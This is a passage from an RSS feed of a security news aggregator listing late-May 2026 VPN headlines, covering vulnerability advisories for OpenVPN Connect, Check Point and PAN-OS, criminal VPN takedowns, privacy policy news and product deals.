<guid isPermaLink="true">https://tsecurity.de/de/3561231/IT+Sicherheit/Hacker/CVE-2026-0257%3A+Rapid7+Caught+Attackers+Abusing+Forged+VPN+Cookies+Against+Multiple+Customers/</guid>
<pubDate>Sun, 31 May 2026 19:52:29 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Sick of scammers and spammers? Our exclusive VPN deal includes an email alias generator, ad blocker, and unlimited device coverage.]]></title> 
<description><![CDATA[Surfshark&rsquo;s range of security tools make it a great pick for those who want more than just a VPN without breaking the bank ]]></description>
<link>https://tsecurity.de/de/3559927/IT+Nachrichten/Sick+of+scammers+and+spammers%3F+Our+exclusive+VPN+deal+includes+an+email+alias+generator%2C+ad+blocker%2C+and+unlimited+device+coverage./</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559927/IT+Nachrichten/Sick+of+scammers+and+spammers%3F+Our+exclusive+VPN+deal+includes+an+email+alias+generator%2C+ad+blocker%2C+and+unlimited+device+coverage./</guid>
<pubDate>Sun, 31 May 2026 03:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Operation Saffron: Krimineller VPN-Dienst für Ransomware abgeschaltet]]></title> 
<description><![CDATA[... Cyberkriminalit&auml;tsermittlung &ldquo; aufgetaucht. Anzeige. Jetzt Newsletter abonnieren. Einmal im Monat die besten News von B2B CYBER SECURITY lesen. E&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3559640/IT+Sicherheit/Cybersecurity+Nachrichten/Operation+Saffron%3A+Krimineller+VPN-Dienst+f%C3%BCr+Ransomware+abgeschaltet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559640/IT+Sicherheit/Cybersecurity+Nachrichten/Operation+Saffron%3A+Krimineller+VPN-Dienst+f%C3%BCr+Ransomware+abgeschaltet/</guid>
<pubDate>Sat, 30 May 2026 19:34:06 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto GlobalProtect VPN auth bypass flaw now exploited in attacks]]></title> 
<description><![CDATA[Palo Alto Networks is warning that hackers are now exploiting a PAN-OS GlobalProtect authentication bypass flaw, tracked as CVE-2026-0257, in attacks attempting to breach corporate networks. [...] ]]></description>
<link>https://tsecurity.de/de/3559474/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+GlobalProtect+VPN+auth+bypass+flaw+now+exploited+in+attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3559474/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+GlobalProtect+VPN+auth+bypass+flaw+now+exploited+in+attacks/</guid>
<pubDate>Sat, 30 May 2026 20:02:51 +0200</pubDate>
</item>
<item> 
<title><![CDATA[I've watched the entire Champions League 2026 using this streaming VPN — so I know it'll be the perfect solution if you want to stream the Champions League final securely]]></title> 
<description><![CDATA[My team might&#039;ve dropped out, but my connection hasn&#039;t since ]]></description>
<link>https://tsecurity.de/de/3558125/IT+Nachrichten/I%27ve+watched+the+entire+Champions+League+2026+using+this+streaming+VPN+%E2%80%94+so+I+know+it%27ll+be+the+perfect+solution+if+you+want+to+stream+the+Champions+League+final+securely/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3558125/IT+Nachrichten/I%27ve+watched+the+entire+Champions+League+2026+using+this+streaming+VPN+%E2%80%94+so+I+know+it%27ll+be+the+perfect+solution+if+you+want+to+stream+the+Champions+League+final+securely/</guid>
<pubDate>Sat, 30 May 2026 03:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA['The situation isn’t looking good' — Russia halts VPN fees, but the Kremlin's war against censorship circumvention tools doubles down]]></title> 
<description><![CDATA[A new major wave of VPN blocks has left residents with very few means of going back online. Here&#039;s all we know. ]]></description>
<link>https://tsecurity.de/de/3557152/IT+Nachrichten/%27The+situation+isn%E2%80%99t+looking+good%27+%E2%80%94+Russia+halts+VPN+fees%2C+but+the+Kremlin%27s+war+against+censorship+circumvention+tools+doubles+down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557152/IT+Nachrichten/%27The+situation+isn%E2%80%99t+looking+good%27+%E2%80%94+Russia+halts+VPN+fees%2C+but+the+Kremlin%27s+war+against+censorship+circumvention+tools+doubles+down/</guid>
<pubDate>Fri, 29 May 2026 17:18:42 +0200</pubDate>
</item>
<item> 
<title><![CDATA[FBI confirms 25 ransomware groups using First VPN’s now seized services — here’s what we know]]></title> 
<description><![CDATA[FBI links First VPN&rsquo;s activities to gangs involved in cybercrime and calls for tighter security controls and behavioural monitoring to prevent cyberattacks. ]]></description>
<link>https://tsecurity.de/de/3557086/IT+Nachrichten/FBI+confirms+25+ransomware+groups+using+First+VPN%E2%80%99s+now+seized+services+%E2%80%94+here%E2%80%99s+what+we+know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557086/IT+Nachrichten/FBI+confirms+25+ransomware+groups+using+First+VPN%E2%80%99s+now+seized+services+%E2%80%94+here%E2%80%99s+what+we+know/</guid>
<pubDate>Fri, 29 May 2026 16:18:20 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ExpressVPN blows away the competition on security audits - but what do they mean?]]></title> 
<description><![CDATA[Ever wonder what a VPN audit is or why they&#039;re always announced to the public? Here&#039;s why. ]]></description>
<link>https://tsecurity.de/de/3557082/IT+Nachrichten/ExpressVPN+blows+away+the+competition+on+security+audits+-+but+what+do+they+mean%3F/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3557082/IT+Nachrichten/ExpressVPN+blows+away+the+competition+on+security+audits+-+but+what+do+they+mean%3F/</guid>
<pubDate>Fri, 29 May 2026 16:22:34 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-48131 | Check Point Quantum Security Gateway VPN Service heap-based overflow (WID-SEC-2026-1726)]]></title> 
<description><![CDATA[A vulnerability was found in Check Point Quantum Security Gateway and classified as critical. This affects an unknown part of the component VPN Service. Such manipulation leads to heap-based buffer overflow.

This vulnerability is uniquely identified as CVE-2026-48131. The attack can be launched remotely. No exploit exists. ]]></description>
<link>https://tsecurity.de/de/3556709/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-48131+%7C+Check+Point+Quantum+Security+Gateway+VPN+Service+heap-based+overflow+%28WID-SEC-2026-1726%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556709/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-48131+%7C+Check+Point+Quantum+Security+Gateway+VPN+Service+heap-based+overflow+%28WID-SEC-2026-1726%29/</guid>
<pubDate>Fri, 29 May 2026 11:11:27 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-48132 | Check Point Quantum Security Gateway VPN Processing Service length out-of-bounds (WID-SEC-2026-1726)]]></title> 
<description><![CDATA[A vulnerability was found in Check Point Quantum Security Gateway. It has been classified as problematic. This vulnerability affects unknown code of the component VPN Processing Service. Performing a manipulation of the argument length results in out-of-bounds read.

This vulnerability was named CVE-2026-48132. The attack may be initiated remotely. There is no available exploit. ]]></description>
<link>https://tsecurity.de/de/3556706/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-48132+%7C+Check+Point+Quantum+Security+Gateway+VPN+Processing+Service+length+out-of-bounds+%28WID-SEC-2026-1726%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556706/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-48132+%7C+Check+Point+Quantum+Security+Gateway+VPN+Processing+Service+length+out-of-bounds+%28WID-SEC-2026-1726%29/</guid>
<pubDate>Fri, 29 May 2026 11:11:28 +0200</pubDate>
</item>
<item> 
<title><![CDATA[OpenVPN Connect macOS Vulnerability Allows Remote Command Execution]]></title> 
<description><![CDATA[OpenVPN has released a critical security update for its macOS client after researchers uncovered a vulnerability that could allow remote command execution on affected systems. The issue, tracked as CVE-2026-9560, impacts the privileged helper component in OpenVPN Connect and has&hellip;
Read more &rarr;
The post OpenVPN Connect macOS Vulnerability Allows Remote Command Execution appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3556406/IT+Sicherheit/Cybersecurity+Nachrichten/OpenVPN+Connect+macOS+Vulnerability+Allows+Remote+Command+Execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556406/IT+Sicherheit/Cybersecurity+Nachrichten/OpenVPN+Connect+macOS+Vulnerability+Allows+Remote+Command+Execution/</guid>
<pubDate>Fri, 29 May 2026 09:36:56 +0200</pubDate>
</item>
<item> 
<title><![CDATA[OpenVPN Connect macOS Vulnerability Allows Remote Command Execution]]></title> 
<description><![CDATA[OpenVPN has released a critical security update for its macOS client after researchers uncovered a vulnerability that could allow remote command execution on affected systems. The issue, tracked as CVE-2026-9560, impacts the privileged helper component in OpenVPN Connect and has been fixed in version 3.8.2 (build 6009), released on May 25, 2026. OpenVPN Connect macOS [&hellip;]
The post OpenVPN Connect macOS Vulnerability Allows Remote Command Execution appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform. ]]></description>
<link>https://tsecurity.de/de/3556383/IT+Sicherheit/Cybersecurity+Nachrichten/OpenVPN+Connect+macOS+Vulnerability+Allows+Remote+Command+Execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556383/IT+Sicherheit/Cybersecurity+Nachrichten/OpenVPN+Connect+macOS+Vulnerability+Allows+Remote+Command+Execution/</guid>
<pubDate>Fri, 29 May 2026 09:18:44 +0200</pubDate>
</item>
<item> 
<title><![CDATA[BSI-Warnung zu OpenVPN Connect für macOS: CVE-2026-9560 hochriskant]]></title> 
<description><![CDATA[BERLIN / LONDON (IT BOLTWISE) &ndash; Das BSI warnt vor einer hochriskanten Schwachstelle in OpenVPN Connect unter macOS: Mit der CVE-2026-9560 l&auml;sst sich offenbar eine Privilegieneskalation ausnutzen. Betroffen sind Mac-Varianten sowie bestimmte Versionen des Open-Source-OpenVPN-Clients. Laut Bewertung liegt der CVSS Base Score bei 9,3, was die Dringlichkeit f&uuml;r Unternehmen und IT-Teams erh&ouml;ht. Jetzt geht es [&hellip;]
... den vollst&auml;ndigen Artikel &raquo;BSI-Warnung zu OpenVPN Connect f&uuml;r macOS: CVE-2026-9560 hochriskant&laquo; lesen
Dieser Beitrag BSI-Warnung zu OpenVPN Connect f&uuml;r macOS: CVE-2026-9560 hochriskant erschien als erstes auf IT BOLTWISE x Artificial Intelligence. ]]></description>
<link>https://tsecurity.de/de/3556249/IT+Sicherheit/Cybersecurity+Nachrichten/BSI-Warnung+zu+OpenVPN+Connect+f%C3%BCr+macOS%3A+CVE-2026-9560+hochriskant/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556249/IT+Sicherheit/Cybersecurity+Nachrichten/BSI-Warnung+zu+OpenVPN+Connect+f%C3%BCr+macOS%3A+CVE-2026-9560+hochriskant/</guid>
<pubDate>Fri, 29 May 2026 08:16:06 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical OpenVPN Connect macOS Flaw Enables Command Execution]]></title> 
<description><![CDATA[A critical privilege escalation vulnerability has been discovered and patched in OpenVPN Connect for macOS, enabling local attackers to execute arbitrary commands with full root-level privileges a severe risk for enterprise endpoints relying on OpenVPN for remote access security. Tracked as&nbsp;CVE-2026-9560, the flaw carries a&nbsp;CVSS 4.0 base score of 9.4 (CRITICAL) underscoring the severity of [&hellip;]
The post Critical OpenVPN Connect macOS Flaw Enables Command Execution appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3556196/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+macOS+Flaw+Enables+Command+Execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3556196/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+macOS+Flaw+Enables+Command+Execution/</guid>
<pubDate>Fri, 29 May 2026 07:26:55 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Let Avast SecureLine VPN be the productive one]]></title> 
<description><![CDATA[Author: Avast - Bewertung: 0x - Views:0 Shoutout to Avast SecureLine VPN for carrying the team 🫶🏻 ]]></description>
<link>https://tsecurity.de/de/3555811/IT+Sicherheit/Malware+%2F+Trojaner+%2F+Viren/Let+Avast+SecureLine+VPN+be+the+productive+one/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555811/IT+Sicherheit/Malware+%2F+Trojaner+%2F+Viren/Let+Avast+SecureLine+VPN+be+the+productive+one/</guid>
<pubDate>Fri, 29 May 2026 02:44:26 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2014-5455 | OpenVPN 2.1.28.0 Crafted Program program.exe unquoted search path (ID 127439 / EDB-34037)]]></title> 
<description><![CDATA[A vulnerability, which was classified as problematic, was found in OpenVPN 2.1.28.0. Affected by this vulnerability is an unknown functionality of the file program.exe of the component Crafted Program. Such manipulation leads to unquoted search path.

This vulnerability is referenced as CVE-2014-5455. The attack can only be performed from a local environment. Furthermore, an exploit is available. ]]></description>
<link>https://tsecurity.de/de/3555715/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2014-5455+%7C+OpenVPN+2.1.28.0+Crafted+Program+program.exe+unquoted+search+path+%28ID+127439+%2F+EDB-34037%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555715/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2014-5455+%7C+OpenVPN+2.1.28.0+Crafted+Program+program.exe+unquoted+search+path+%28ID+127439+%2F+EDB-34037%29/</guid>
<pubDate>Fri, 29 May 2026 00:37:18 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2014-5455 | OpenVPN 2.3.8 PrivateTunnel unquoted search path (ZSL-2014-5192 / EDB-34037)]]></title> 
<description><![CDATA[A vulnerability categorized as problematic has been discovered in OpenVPN 2.3.8. This impacts an unknown function of the component PrivateTunnel Handler. Such manipulation leads to unquoted search path.

This vulnerability is listed as CVE-2014-5455. The attack must be carried out locally. In addition, an exploit is available. ]]></description>
<link>https://tsecurity.de/de/3555332/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2014-5455+%7C+OpenVPN+2.3.8+PrivateTunnel+unquoted+search+path+%28ZSL-2014-5192+%2F+EDB-34037%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3555332/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2014-5455+%7C+OpenVPN+2.3.8+PrivateTunnel+unquoted+search+path+%28ZSL-2014-5192+%2F+EDB-34037%29/</guid>
<pubDate>Thu, 28 May 2026 20:39:25 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical OpenVPN Connect for macOS Vulnerability Let Attackers Execute Arbitrary Commands]]></title> 
<description><![CDATA[A critical privilege escalation vulnerability has been discovered in OpenVPN Connect for macOS, enabling local attackers to execute arbitrary commands with elevated privileges through the application&rsquo;s background service component. Tracked as CVE-2026-9560, the flaw affects all versions from 3.5.1 through&hellip;
Read more &rarr;
The post Critical OpenVPN Connect for macOS Vulnerability Let Attackers Execute Arbitrary Commands appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3554818/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+for+macOS+Vulnerability+Let+Attackers+Execute+Arbitrary+Commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554818/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+for+macOS+Vulnerability+Let+Attackers+Execute+Arbitrary+Commands/</guid>
<pubDate>Thu, 28 May 2026 18:02:58 +0200</pubDate>
</item>
<item> 
<title><![CDATA[ExpressVPN im Test: Für wen sich der Dienst zum Premium-Preis lohnt]]></title> 
<description><![CDATA[ExpressVPN z&auml;hlt dank hoher Sicherheitsstandards, eines eigenen Protokolls f&uuml;r Top-Geschwindigkeit und weltweiter Serverabdeckung zu den Premium-Anbietern auf dem VPN-Markt. Zu Recht?
																					Dieser Artikel wurde einsortiert unter 
																	Download,																	VPN,																	ExpressVPN. ]]></description>
<link>https://tsecurity.de/de/3554798/IT+Nachrichten/ExpressVPN+im+Test%3A+F%C3%BCr+wen+sich+der+Dienst+zum+Premium-Preis+lohnt/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554798/IT+Nachrichten/ExpressVPN+im+Test%3A+F%C3%BCr+wen+sich+der+Dienst+zum+Premium-Preis+lohnt/</guid>
<pubDate>Thu, 28 May 2026 17:15:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Critical OpenVPN Connect for macOS Vulnerability Let Attackers Execute Arbitrary Commands]]></title> 
<description><![CDATA[A critical privilege escalation vulnerability has been discovered in OpenVPN Connect for macOS, enabling local attackers to execute arbitrary commands with elevated privileges through the application&rsquo;s background service component. Tracked as CVE-2026-9560, the flaw affects all versions from 3.5.1 through 3.8.1 and has been assigned a CVSS 4.0 base score of 9.4 (Critical). The security [&hellip;]
The post Critical OpenVPN Connect for macOS Vulnerability Let Attackers Execute Arbitrary Commands appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3554764/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+for+macOS+Vulnerability+Let+Attackers+Execute+Arbitrary+Commands/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554764/IT+Sicherheit/Cybersecurity+Nachrichten/Critical+OpenVPN+Connect+for+macOS+Vulnerability+Let+Attackers+Execute+Arbitrary+Commands/</guid>
<pubDate>Thu, 28 May 2026 17:39:36 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Polymarket blocks VPNs and tightens identity verification as over 30 countries ban the betting platform]]></title> 
<description><![CDATA[Polymarket is taking a harder stance against VPN use and pushing for identity verification, marking a shift away from permissionless trading as more countries restrict the platform. ]]></description>
<link>https://tsecurity.de/de/3554745/IT+Nachrichten/Polymarket+blocks+VPNs+and+tightens+identity+verification+as+over+30+countries+ban+the+betting+platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554745/IT+Nachrichten/Polymarket+blocks+VPNs+and+tightens+identity+verification+as+over+30+countries+ban+the+betting+platform/</guid>
<pubDate>Thu, 28 May 2026 17:35:27 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN isn't just a VPN anymore, but a full security suite - here's what you get now]]></title> 
<description><![CDATA[NordVPN argues that antivirus now means far more than it used to, so creating an app that combines VPN services with modern threat protection is the right path. ]]></description>
<link>https://tsecurity.de/de/3554153/IT+Nachrichten/NordVPN+isn%27t+just+a+VPN+anymore%2C+but+a+full+security+suite+-+here%27s+what+you+get+now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3554153/IT+Nachrichten/NordVPN+isn%27t+just+a+VPN+anymore%2C+but+a+full+security+suite+-+here%27s+what+you+get+now/</guid>
<pubDate>Thu, 28 May 2026 14:39:42 +0200</pubDate>
</item>
<item> 
<title><![CDATA[I set up a router-based VPN for my TV, and it's the cheap security fix it desperately needed]]></title> 
<description><![CDATA[Installing a VPN on your smart TV blocks hackers from accessing your network and stealing your data. Here&#039;s how I set up mine. ]]></description>
<link>https://tsecurity.de/de/3553996/IT+Nachrichten/I+set+up+a+router-based+VPN+for+my+TV%2C+and+it%27s+the+cheap+security+fix+it+desperately+needed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553996/IT+Nachrichten/I+set+up+a+router-based+VPN+for+my+TV%2C+and+it%27s+the+cheap+security+fix+it+desperately+needed/</guid>
<pubDate>Thu, 28 May 2026 14:00:39 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPNs are not a 'threat' — industry hopes for an evidence-based outcome to UK online safety consultation]]></title> 
<description><![CDATA[As May 26 marked the deadline for the UK&#039;s online safety consultation, we will soon know what the fate for VPN users in the country will look like. ]]></description>
<link>https://tsecurity.de/de/3553474/IT+Nachrichten/VPNs+are+not+a+%27threat%27+%E2%80%94+industry+hopes+for+an+evidence-based+outcome+to+UK+online+safety+consultation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553474/IT+Nachrichten/VPNs+are+not+a+%27threat%27+%E2%80%94+industry+hopes+for+an+evidence-based+outcome+to+UK+online+safety+consultation/</guid>
<pubDate>Thu, 28 May 2026 10:48:43 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Cybercriminals are using GTA 6 hype to spread malware ahead of launch, NordVPN warns]]></title> 
<description><![CDATA[NordVPN warns GTA 6 fans about fake beta keys, phishing pages, Android adware, and malware disguised as early access downloads. ]]></description>
<link>https://tsecurity.de/de/3553449/IT+Nachrichten/Cybercriminals+are+using+GTA+6+hype+to+spread+malware+ahead+of+launch%2C+NordVPN+warns/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3553449/IT+Nachrichten/Cybercriminals+are+using+GTA+6+hype+to+spread+malware+ahead+of+launch%2C+NordVPN+warns/</guid>
<pubDate>Thu, 28 May 2026 10:43:26 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN's New App Acts as an All-in-One Digital Privacy and Security Hub]]></title> 
<description><![CDATA[A VPN is only one layer of privacy defense. Antivirus protection adds security from phishing, scams and account takeovers, too. ]]></description>
<link>https://tsecurity.de/de/3552493/IT+Nachrichten/NordVPN%27s+New+App+Acts+as+an+All-in-One+Digital+Privacy+and+Security+Hub/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3552493/IT+Nachrichten/NordVPN%27s+New+App+Acts+as+an+All-in-One+Digital+Privacy+and+Security+Hub/</guid>
<pubDate>Wed, 27 May 2026 23:02:24 +0200</pubDate>
</item>
<item> 
<title><![CDATA['Iranians want to reconnect with the outside world' — Proton VPN sees 6,000% signup increase as Iran's internet is partially restored]]></title> 
<description><![CDATA[Iranian internet users have rushed to secure tools as the country&#039;s internet partially got back online following a three-month blackout. Here&#039;s all we know. ]]></description>
<link>https://tsecurity.de/de/3551572/IT+Nachrichten/%27Iranians+want+to+reconnect+with+the+outside+world%27+%E2%80%94+Proton+VPN+sees+6%2C000%25+signup+increase+as+Iran%27s+internet+is+partially+restored/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551572/IT+Nachrichten/%27Iranians+want+to+reconnect+with+the+outside+world%27+%E2%80%94+Proton+VPN+sees+6%2C000%25+signup+increase+as+Iran%27s+internet+is+partially+restored/</guid>
<pubDate>Wed, 27 May 2026 16:47:03 +0200</pubDate>
</item>
<item> 
<title><![CDATA[VPN deal of the week: get Amazon gift cards worth up to $30 with 2-year Surfshark plans — exclusively for TechRadar readers]]></title> 
<description><![CDATA[Protect your data &amp; get a free Amazon gift card. ]]></description>
<link>https://tsecurity.de/de/3551455/IT+Nachrichten/VPN+deal+of+the+week%3A+get+Amazon+gift+cards+worth+up+to+%2430+with+2-year+Surfshark+plans+%E2%80%94+exclusively+for+TechRadar+readers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3551455/IT+Nachrichten/VPN+deal+of+the+week%3A+get+Amazon+gift+cards+worth+up+to+%2430+with+2-year+Surfshark+plans+%E2%80%94+exclusively+for+TechRadar+readers/</guid>
<pubDate>Wed, 27 May 2026 16:14:01 +0200</pubDate>
</item>
<item> 
<title><![CDATA[[NEU] [hoch] OpenVPN Connect (MacOS): Schwachstelle ermöglicht Privilegieneskalation]]></title> 
<description><![CDATA[Ein lokaler Angreifer kann eine Schwachstelle in OpenVPN Connect (MacOS) ausnutzen, um seine Privilegien zu erh&ouml;hen. ]]></description>
<link>https://tsecurity.de/de/3550495/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5Bhoch%5D+OpenVPN+Connect+%28MacOS%29%3A+Schwachstelle+erm%C3%B6glicht+Privilegieneskalation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550495/IT+Sicherheit/Cybersecurity+Nachrichten/%5BNEU%5D+%5Bhoch%5D+OpenVPN+Connect+%28MacOS%29%3A+Schwachstelle+erm%C3%B6glicht+Privilegieneskalation/</guid>
<pubDate>Wed, 27 May 2026 11:05:32 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Update für IPFire: Schnelleres VPN dank OpenVPN 2.7]]></title> 
<description><![CDATA[Mit OpenVPN 2.7 und Data Channel Offloading steigt der VPN-Durchsatz in IPFire auf bis zu 10 GBit/s. Dazu schlie&szlig;t das Update kritische Kernel-L&uuml;cken. ]]></description>
<link>https://tsecurity.de/de/3550293/IT+Nachrichten/Update+f%C3%BCr+IPFire%3A+Schnelleres+VPN+dank+OpenVPN+2.7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550293/IT+Nachrichten/Update+f%C3%BCr+IPFire%3A+Schnelleres+VPN+dank+OpenVPN+2.7/</guid>
<pubDate>Wed, 27 May 2026 10:01:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Update für IPFire: Schnelleres VPN dank OpenVPN 2.7]]></title> 
<description><![CDATA[Mit OpenVPN 2.7 und Data Channel Offloading steigt der VPN-Durchsatz in IPFire auf bis zu 10 GBit/s. Dazu schlie&szlig;t das Update kritische Kernel-L&uuml;cken. ]]></description>
<link>https://tsecurity.de/de/3550266/IT+Sicherheit/Cybersecurity+Nachrichten/Update+f%C3%BCr+IPFire%3A+Schnelleres+VPN+dank+OpenVPN+2.7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550266/IT+Sicherheit/Cybersecurity+Nachrichten/Update+f%C3%BCr+IPFire%3A+Schnelleres+VPN+dank+OpenVPN+2.7/</guid>
<pubDate>Wed, 27 May 2026 10:01:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA['Protection needs to evolve' — NordVPN rebrands as an all-in-one VPN app for next-generation protection]]></title> 
<description><![CDATA[The digital security giant is bringing next-gen antivirus, dark web monitoring, and its industry-leading VPN into a single, unified experience. ]]></description>
<link>https://tsecurity.de/de/3550086/IT+Nachrichten/%27Protection+needs+to+evolve%27+%E2%80%94+NordVPN+rebrands+as+an+all-in-one+VPN+app+for+next-generation+protection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3550086/IT+Nachrichten/%27Protection+needs+to+evolve%27+%E2%80%94+NordVPN+rebrands+as+an+all-in-one+VPN+app+for+next-generation+protection/</guid>
<pubDate>Wed, 27 May 2026 09:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN warns of fake GTA 6 pre-order scams spreading malware and phishing attacks]]></title> 
<description><![CDATA[Cybercriminals are exploiting excitement around Grand Theft Auto VI to spread malware, phishing pages, and fake pre-order scams ahead of the game&rsquo;s official release, according to new research from NordVPN. Researchers at NordVPN&rsquo;s Threat Protection team said they identified dozens of malicious websites impersonating Rockstar Games, gaming storefronts, and piracy platforms in an effort to &hellip;
The post NordVPN warns of fake GTA 6 pre-order scams spreading malware and phishing attacks appeared first on CyberInsider. ]]></description>
<link>https://tsecurity.de/de/3549191/IT+Sicherheit/Cybersecurity+Nachrichten/NordVPN+warns+of+fake+GTA+6+pre-order+scams+spreading+malware+and+phishing+attacks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549191/IT+Sicherheit/Cybersecurity+Nachrichten/NordVPN+warns+of+fake+GTA+6+pre-order+scams+spreading+malware+and+phishing+attacks/</guid>
<pubDate>Tue, 26 May 2026 22:32:31 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2026-9560 | OpenVPN Connect up to 3.8.1 Background Service os command injection (EUVD-2026-31941)]]></title> 
<description><![CDATA[A vulnerability classified as critical was found in OpenVPN Connect up to 3.8.1. This impacts an unknown function of the component Background Service. Such manipulation leads to os command injection.

This vulnerability is uniquely identified as CVE-2026-9560. Local access is required to approach this attack. No exploit exists. ]]></description>
<link>https://tsecurity.de/de/3549159/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9560+%7C+OpenVPN+Connect+up+to+3.8.1+Background+Service+os+command+injection+%28EUVD-2026-31941%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3549159/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2026-9560+%7C+OpenVPN+Connect+up+to+3.8.1+Background+Service+os+command+injection+%28EUVD-2026-31941%29/</guid>
<pubDate>Tue, 26 May 2026 21:59:06 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Absolute Anonymity: This VPN allows cash payments and costs the same every month, forever]]></title> 
<description><![CDATA[Simple, secure connections don&#039;t get better ]]></description>
<link>https://tsecurity.de/de/3548759/IT+Nachrichten/Absolute+Anonymity%3A+This+VPN+allows+cash+payments+and+costs+the+same+every+month%2C+forever/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548759/IT+Nachrichten/Absolute+Anonymity%3A+This+VPN+allows+cash+payments+and+costs+the+same+every+month%2C+forever/</guid>
<pubDate>Tue, 26 May 2026 18:38:57 +0200</pubDate>
</item>
<item> 
<title><![CDATA[The UK's online safety consultation ends today — here's what it could mean for VPNs]]></title> 
<description><![CDATA[Findings from the &quot;Growing up in the online world&quot; national consultation will determine whether VPN services will be age-gated in the UK. ]]></description>
<link>https://tsecurity.de/de/3548600/IT+Nachrichten/The+UK%27s+online+safety+consultation+ends+today+%E2%80%94+here%27s+what+it+could+mean+for+VPNs/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548600/IT+Nachrichten/The+UK%27s+online+safety+consultation+ends+today+%E2%80%94+here%27s+what+it+could+mean+for+VPNs/</guid>
<pubDate>Tue, 26 May 2026 17:56:11 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN wins crucial legal battle in Spain over La Liga piracy fines]]></title> 
<description><![CDATA[A Spanish court has sided with NordVPN, rejecting fines pushed by soccer league La Liga. Here is what the ruling means for digital privacy and internet freedom. ]]></description>
<link>https://tsecurity.de/de/3548352/IT+Nachrichten/NordVPN+wins+crucial+legal+battle+in+Spain+over+La+Liga+piracy+fines/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3548352/IT+Nachrichten/NordVPN+wins+crucial+legal+battle+in+Spain+over+La+Liga+piracy+fines/</guid>
<pubDate>Tue, 26 May 2026 16:43:21 +0200</pubDate>
</item>
<item> 
